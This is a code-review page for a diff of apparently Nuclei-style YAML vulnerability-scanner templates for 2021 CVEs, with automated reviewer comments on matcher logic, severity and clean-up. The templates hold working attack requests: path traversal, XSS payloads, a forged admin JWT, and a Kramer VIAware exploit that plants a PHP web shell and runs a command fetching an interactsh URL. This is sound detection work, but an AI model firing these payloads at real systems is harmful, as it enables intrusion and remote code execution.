HTTP Interaction words: - 
"http" + +# digest: 4a0a00473045022008ad1016138dd94be3c008057cd98c578852cd34542418ef69bbe2105a62218f022100b3473394b34f254d77d17634896eb71c13c9755657653333ef3f78cd5ad4f2c6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2021-33807.yaml b/poc/cve/CVE-2021-33807.yaml index 4acf49004b..9cdd98988d 100644 --- a/poc/cve/CVE-2021-33807.yaml +++ b/poc/cve/CVE-2021-33807.yaml 
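Review bot: The added classification says `PR:H` and the severity moves from `critical` to `high`, but the rewritten `description` still speaks of an "unauthenticated, remote attacker". The raw request shown carries only `Host` and `Accept` headers, so the metadata and the check disagree about whether credentials are needed. Whichever is correct, say so in the template, e.g. `# NVD scores this PR:H; the request below is sent without credentials`. The description also lost a word: `multiple vulnerabilities its web-based` should read `multiple vulnerabilities in its web-based`.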
@@ -5,34 +5,46 @@ info: author: daffainfo severity: high description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1. reference: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 - tags: cve,cve2021,lfi,gespage + - https://www.gespage.com/cartadis-db/ + - https://www.cartadis.com/gespage-website/ + - https://support.gespage.com/fr/support/solutions/articles/14000130201-security-advisory-gespage-directory-traversal classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-33807 cwe-id: CWE-22 + epss-score: 0.01682 + epss-percentile: 0.86287 + cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: gespage + product: gespage + tags: cve,cve2021,lfi,gespage -requests: +http: - method: GET path: - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log" matchers-condition: and matchers: - - type: word + part: body words: - "NetpDoDomainJoin:" - part: body - type: word + part: header words: - "application/octet-stream" - part: header - type: status status: - 200 +# digest: 4a0a00473045022100bb8cb970059144b7ea82fb9f2b670f8dd305a28cbeb0c0816d89c700a84d6d19022054ad0173937366433f15c9f005f06a383e04647457228a49d2eada71988c093b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-34370.yaml b/poc/cve/CVE-2021-34370.yaml index 8973cec47a..52641cadd1 100644 --- a/poc/cve/CVE-2021-34370.yaml +++ b/poc/cve/CVE-2021-34370.yaml 
@@ -1,17 +1,39 @@ id: CVE-2021-34370 + info: - name: Accela Civic Platform 21.1 - Open Redirect & XSS + name: Accela Civic Platform <=21.1 - Cross-Site Scripting author: 0x_Akoko - description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 - reference: https://www.exploit-db.com/exploits/49990 severity: medium - tags: xss,redirect,cves -requests: + description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL. + remediation: | + Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation and sanitization. + reference: + - https://www.exploit-db.com/exploits/49990 + - https://www.accela.com/civic-platform/ + - https://gist.github.com/0xx7/7e9f1b725f7ff98b9239d3cb027b7dc8 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34370 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-34370 + cwe-id: CWE-79 + epss-score: 0.00183 + epss-percentile: 0.55492 + cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: accela + product: civic_platform + tags: xss,redirect,cve,cve2021,accela,edb + +http: - method: GET path: - - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" + - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/" + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4a0a0047304502202ba92da2ff45aa587359de79b28935deb9d42d230d3119265d8ec7f35a86beed022100f1bf06f9cabaf85f7ec08ba18ec12879f0e02522161be1842310869cc189fc1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
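Review bot: In the updated `regex`, the scheme group is still optional (`(?:https?://|//)?`), so a relative `Location: interact.sh/...` value, which keeps the browser on the same site, satisfies the matcher. The CVE-2021-32618 hunk in this commit makes the equivalent group mandatory; doing the same here gives `'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'`. The new name and description call this cross-site scripting while the only check is the redirect header, which is worth a one-line comment above `matchers:`.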
diff --git a/poc/cve/CVE-2021-34643.yaml b/poc/cve/CVE-2021-34643.yaml index 7828497ddc..5a6cd61db5 100644 --- a/poc/cve/CVE-2021-34643.yaml +++ b/poc/cve/CVE-2021-34643.yaml @@ -1,33 +1,19 @@ id: CVE-2021-34643 - info: - name: WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting + name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting author: dhiyaneshDK severity: medium - description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts. - remediation: | - Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability. + description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2. reference: - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643 - - https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657 - - https://nvd.nist.gov/vuln/detail/CVE-2021-34643 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-34643 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.45221 - cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: skaut-bazar_project - product: skaut-bazar - framework: wordpress - tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated - -http: + tags: wordpress,cve,cve2021,wp-plugin,authenticated +requests: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -40,20 +26,17 @@ http: - | GET /wp-admin/options-general.php//?page=skatubazar_option HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - "" - + - type: status + status: + - 200 - type: word part: header words: - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a004730450221008213006f9d2edd7d23fa5c75d0c2a2c694269e310390d70f5a41760393e95e360220524f58e7005ea2d999659322eecd74d47ddbf69374f896b1f6a67b6a7e49af90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-35265.yaml b/poc/cve/CVE-2021-35265.yaml index 7db13f166a..013ce549c4 100644 --- a/poc/cve/CVE-2021-35265.yaml +++ b/poc/cve/CVE-2021-35265.yaml 
@@ -1,59 +1,33 @@ id: CVE-2021-35265 - info: - name: MaxSite CMS > V106 - Cross-Site Scripting + name: MaxSite CMS XSS author: pikpikcu severity: medium - description: | - A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page." - remediation: | - Upgrade to a patched version of MaxSite CMS or apply the vendor-provided security patch to mitigate the XSS vulnerability (CVE-2021-35265). + description: Reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. reference: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 - - https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a + tags: cve,cve2021,maxsite,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-35265 cwe-id: CWE-79 - epss-score: 0.00127 - epss-percentile: 0.47124 - cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: maxsite - product: maxsite_cms - shodan-query: html:'content="MaxSite CMS' - tags: cve,cve2021,maxsite,xss - -http: +requests: - method: GET path: - - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' - - '{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E' - + - '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word - part: body words: - - '>' - - - type: word + - '' part: body - words: - - 'mso-comments-rss">RSS' - - 'MaxSite CMS' - - 'feed">RSS' - condition: or - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 
490a0046304402203b5c12a3e6807470ad68645b9e3c17ba6b1b0394eec9037b6cea6d0fde41ccf4022013e4080cece77dd6e748ef4fefd17d2ef17a07632a66a69b73fcebfa31df7f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-35587.yaml b/poc/cve/CVE-2021-35587.yaml index e7ae22068a..cf3365bc6a 100644 --- a/poc/cve/CVE-2021-35587.yaml +++ b/poc/cve/CVE-2021-35587.yaml 
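Review bot: The new matcher set no longer contains the product fingerprint, the removed `condition: or` word list with `MaxSite CMS` and the RSS markers. Any host that answers 200 with `text/html` and echoes the probe string is therefore reported as CVE-2021-35265, whatever software it runs. As shown here the remaining body word is also empty (`- ''`); if that is what the file really holds rather than a display artefact, it matches every body. Keep the fingerprint matcher next to the reflection check, as sketched below with the word values exactly as this hunk shows them.

```yaml
    matchers:
      # … unchanged: reflection word matcher, header matcher, status matcher …
      - type: word
        part: body
        words:
          - 'mso-comments-rss">RSS'
          - 'MaxSite CMS'
          - 'feed">RSS'
        condition: or
```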
@@ -1,55 +1,38 @@ id: CVE-2021-35587 - info: - name: Oracle Access Manager - Remote Code Execution + name: Pre-auth RCE in Oracle Access Manager author: cckuailong - severity: critical description: | - The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. - remediation: | - Apply the latest security patches provided by Oracle to mitigate this vulnerability. + Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. 
+ severity: critical reference: - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 - https://nvd.nist.gov/vuln/detail/CVE-2021-35587 - - https://www.oracle.com/security-alerts/cpujan2022.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-35587 cwe-id: CWE-502 - epss-score: 0.95643 - epss-percentile: 0.99239 - cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: oracle - product: access_manager - shodan-query: http.title:"Oracle Access Management" fofa-query: body="/oam/pages/css/login_page.css" - tags: cve,cve2021,oam,rce,java,unauth,oracle,kev - -http: + tags: cve,cve2021,oam,rce,java,unauth,oracle +requests: - method: GET path: - '{{BaseURL}}/oam/server/opensso/sessionservice' - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: header words: - "x-oracle-dms-ecid" - "x-oracle-dms-rid" - case-insensitive: true condition: or - + case-insensitive: true - type: word part: body words: - "/oam/pages/css/general.css" - - - type: status - status: - - 200 -# digest: 4a0a0047304502207f1a882f95e835876aeb79412637048617f54129971be83309dff3c0c1e9c808022100f998d609a510842d6a1e613991ac1944994c55bf64a648925696c9483e361680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-36356.yaml b/poc/cve/CVE-2021-36356.yaml index fc0224ed28..c9e0b4294a 100644 --- a/poc/cve/CVE-2021-36356.yaml +++ b/poc/cve/CVE-2021-36356.yaml 
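Review bot: As far as the visible matchers show, a hit proves only that an Oracle Access Manager endpoint is reachable, yet it is reported at `severity: critical`. The checks are status 200, an `x-oracle-dms-ecid` or `x-oracle-dms-rid` response header, and `/oam/pages/css/general.css` in the body; none of them tests for the affected versions named in the description. I would add a comment above `matchers:` such as `# Fingerprint only: confirm the OAM version (11.1.2.3.0, 12.2.1.3.0, 12.2.1.4.0) before treating a hit as vulnerable`. The hunk also drops the `kev` tag, the Oracle advisory reference and the `remediation` text, which readers and triage tooling use to prioritise and fix this finding; those should stay.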
@@ -1,9 +1,12 @@ id: CVE-2021-36356 + info: name: Kramer VIAware - Remote Code Execution author: gy741 severity: critical description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. + remediation: | + Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface. reference: - https://www.exploit-db.com/exploits/50856 - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 @@ -14,8 +17,18 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - tags: rce,viaware,cve,cve2021,kramer -requests: + epss-score: 0.88363 + epss-percentile: 0.9839 + cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: kramerav + product: viaware + tags: viaware,cve,cve2021,kramer,edb,rce,intrusive +variables: + useragent: "{{rand_base(6)}}" + +http: - raw: - | POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 
@@ -24,12 +37,18 @@ requests: radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php - | - GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1 + GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1 Host: {{Hostname}} + + matchers-condition: and matchers: - type: word - part: interactsh_protocol + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - http -# Enhanced by mp on 2022/05/18 + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" +# digest: 4a0a00473045022038f33dbb8c0e4e04f81a15960ffcabd69af2843f7f1a1e19609931f3ca3e0541022100c8117ef56cbb512b2c048b44d2ff596af4af06cb9d8e325d011eb6bd7ab2013b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-37216.yaml b/poc/cve/CVE-2021-37216.yaml index f981030ee1..168adaeeaa 100644 --- a/poc/cve/CVE-2021-37216.yaml +++ b/poc/cve/CVE-2021-37216.yaml 
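Review bot: Nothing in the template removes or documents the file that the first request writes to `/var/www/html/{{randstr}}.php`. After a scan that file stays on the device and keeps accepting a `cmd` parameter from anyone who learns its name. The added `intrusive` tag signals the risk but not the clean-up, so I would add a comment above the raw requests, for example `# Leaves /{{randstr}}.php in the web root of the scanned host; remove it once the scan has finished`. The same applies to the CVE-2021-40870 template later in this commit, which writes `{{randstr}}.php` under `/var/www/php/`. The `User-Agent` correlation added as a second matcher is a sound tightening and needs no change.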
@@ -1,51 +1,35 @@ id: CVE-2021-37216 - info: - name: QSAN Storage Manager <3.3.3 - Cross-Site Scripting + name: QSAN Storage Manager prior to v3.3.3 Reflected XSS author: dwisiswant0 - severity: medium description: | - QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data. - remediation: | - Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability. - reference: - - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-37216 + QSAN Storage Manager header page parameters does not filter special characters. + Remote attackers can inject JavaScript without logging in and launch + reflected XSS attacks to access and modify specific data. + reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html + severity: medium + tags: cve,cve2021,xss,qsan,storage classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-37216 cwe-id: CWE-79 - epss-score: 0.00106 - epss-percentile: 0.4304 - cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: qsan - product: xn8024r_firmware - tags: cve,cve2021,xss,qsan,storage - -http: +requests: - method: GET path: - "{{BaseURL}}/http_header.php" - headers: X-Trigger-XSS: "" - matchers-condition: and matchers: - - type: dsl - dsl: - - "!contains(tolower(header), 'x-xss-protection')" - - type: word part: body words: - '"HTTP_X_TRIGGER_XSS":""' - - type: word part: header words: - "text/html" -# digest: 4a0a00473045022100ddb4cebba2f5fcc8e9adec90efdaca2fe4b9a1d1be7d350065d052b93c7a28dc02201e42d6576744bd3880440724e8b83ef2cf876b7e7f9e63b422871be99861c648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: dsl + dsl: + - "!contains(tolower(all_headers), 'x-xss-protection')" 
diff --git a/poc/cve/CVE-2021-37416.yaml b/poc/cve/CVE-2021-37416.yaml index 3f2ac17b38..ea5a0d7149 100644 --- a/poc/cve/CVE-2021-37416.yaml +++ b/poc/cve/CVE-2021-37416.yaml 
@@ -1,38 +1,52 @@ id: CVE-2021-37416 + info: - name: Zoho ManageEngine ADSelfService Plus - Reflected XSS + name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting author: edoardottt severity: medium - description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page. + description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page. + remediation: | + Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-37416 cwe-id: CWE-79 + epss-score: 0.00118 + epss-percentile: 0.45672 + cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: - shodan-query: http.title:"ManageEngine" verified: true - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 - - https://blog.stmcyber.com/vulns/cve-2021-37416/ + max-request: 1 + vendor: zohocorp + product: manageengine_adselfservice_plus + shodan-query: http.title:"ManageEngine" tags: cve,cve2021,zoho,xss -requests: + +http: - method: GET path: - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: header words: - "text/html" + - type: word part: body words: - ">" - "adsf/js/" condition: and + + - type: status + status: + - 200 +# digest: 
4a0a0047304502207addd537e07781cc3b8c8d0b4620afde94b9ccb2bb20bc3acad9181043464f37022100c3a734611cf58b5296bb3a38cfc079d6ae0aa9b0dbb906104c273badfa2212d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-37580.yaml b/poc/cve/CVE-2021-37580.yaml index 326f01e24f..e83ef1c7fa 100644 --- a/poc/cve/CVE-2021-37580.yaml +++ b/poc/cve/CVE-2021-37580.yaml @@ -1,9 +1,12 @@ id: CVE-2021-37580 + info: name: Apache ShenYu Admin JWT - Authentication Bypass author: pdteam severity: critical description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. + remediation: | + Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-37580 - https://github.com/fengwenhua/CVE-2021-37580 @@ -14,13 +17,22 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37580 cwe-id: CWE-287 + epss-score: 0.91668 + epss-percentile: 0.98635 + cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: shenyu tags: cve,cve2021,apache,jwt,shenyu -requests: + +http: - raw: - | GET /dashboardUser HTTP/1.1 Host: {{Hostname}} X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk + matchers-condition: and matchers: - type: word @@ -29,8 +41,8 @@ requests: - '"userName":"admin"' - '"code":200' condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/05/02 +# digest: 4a0a00473045022100d015114f5c649b19ec82d37c22b9a2ef8fe3d3d6da73f17340a622072a6c588d022020cf627bdb18789231b2034c0990d3d89617fb37b3aa3a99f44005f12a28d38e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-38702.yaml b/poc/cve/CVE-2021-38702.yaml index cf51a9d3b3..d36c7258bd 100644 
--- a/poc/cve/CVE-2021-38702.yaml +++ b/poc/cve/CVE-2021-38702.yaml @@ -1,19 +1,32 @@ id: CVE-2021-38702 info: - name: Cyberoam NetGenie XSS + name: Cyberoam NetGenie Cross-Site Scripting author: geeknik severity: medium - description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. - reference: https://seclists.org/fulldisclosure/2021/Aug/20 - tags: cve,cve2021,cyberoam,netgenie,xss,router + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. + remediation: | + Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. + reference: + - https://seclists.org/fulldisclosure/2021/Aug/20 + - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 + - http://www.cyberoamworks.com/NetGenie-Home.asp + - http://packetstormsecurity.com/files/163859/Cyberoam-NetGenie-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 + epss-score: 0.0076 + epss-percentile: 0.79027 + cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: cyberoamworks + product: netgenie_c0101b1-20141120-ng11vo_firmware + tags: cyberoam,netgenie,xss,router,seclists,cve,packetstorm,cve2021 -requests: +http: - method: GET path: - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -25,10 +38,11 @@ requests: - "" - type: word + part: header words: - "text/html" - part: header - type: status status: - 200 +# digest: 4a0a004730450220351881cd61d500d7b9ff1874d8462f30ddc1afacbff8d760a6d921efd0b7c7860221009bdfb45ebb721a4a690dda3679d6f940ce539ec54b87bd65cd05754e5435a7cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2021-38704.yaml b/poc/cve/CVE-2021-38704.yaml index 8bd65db807..f6123c5175 100644 --- a/poc/cve/CVE-2021-38704.yaml +++ b/poc/cve/CVE-2021-38704.yaml @@ -1,12 +1,9 @@ id: CVE-2021-38704 - info: - name: ClinicCases 7.3.3 Cross-Site Scripting + name: ClinicCases 7.3.3 Reflected Cross-Site Scripting author: alph4byt3 severity: medium description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. - remediation: | - To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 @@ -16,34 +13,25 @@ info: cvss-score: 6.1 cve-id: CVE-2021-38704 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.49694 - cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: cliniccases - product: cliniccases shodan-query: http.title:"ClinicCases",html:"/cliniccases/" tags: xss,cve,cve2021,cliniccases - -http: +requests: - method: GET path: - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word part: body words: - "" - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a0047304502205def21c0dc606d06e3212f573a2591cfe0af45d9282dae68558848673c9bfda402210081d49cd86041400b811ea2a5553b46c1982f89f627bad3e0383e6909ca9530eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/28 diff --git a/poc/cve/CVE-2021-38751.yaml b/poc/cve/CVE-2021-38751.yaml index e44088c6a4..926b40bab6 100644 --- a/poc/cve/CVE-2021-38751.yaml 
+++ b/poc/cve/CVE-2021-38751.yaml @@ -1,9 +1,12 @@ id: CVE-2021-38751 + info: - name: ExponentCMS <= 2.6 Host Header Injection + name: ExponentCMS <= 2.6 - Host Header Injection author: dwisiswant0 severity: medium description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM. + remediation: | + Upgrade ExponentCMS to a version higher than 2.6 or apply the provided patch to fix the Host Header Injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 - https://github.com/exponentcms/exponent-cms/issues/1544 @@ -13,24 +16,34 @@ info: cvss-score: 4.3 cve-id: CVE-2021-38751 cwe-id: CWE-116 + epss-score: 0.00242 + epss-percentile: 0.62003 + cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: exponentcms + product: exponentcms tags: cve,cve2021,exponentcms -requests: + +http: - method: GET path: - "{{BaseURL}}" + headers: - Host: "{{randstr}}.tld" + Host: '{{randstr}}.tld' + matchers-condition: and matchers: - type: word + part: body words: - '{{randstr}}.tld' - 'EXPONENT.PATH' - 'EXPONENT.URL' - part: body condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/03/23 +# digest: 4b0a00483046022100bd10a0651e15e75c49a182f851ba21f4cf0a758c8d3fba6e6d6354ec7d1645f4022100d80e2e17a50c1c169be5be155979072e8de47a89013edeae4946134487ee8983:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-39211.yaml b/poc/cve/CVE-2021-39211.yaml index 0847c7cf42..136bfacadf 100644 --- a/poc/cve/CVE-2021-39211.yaml +++ b/poc/cve/CVE-2021-39211.yaml 
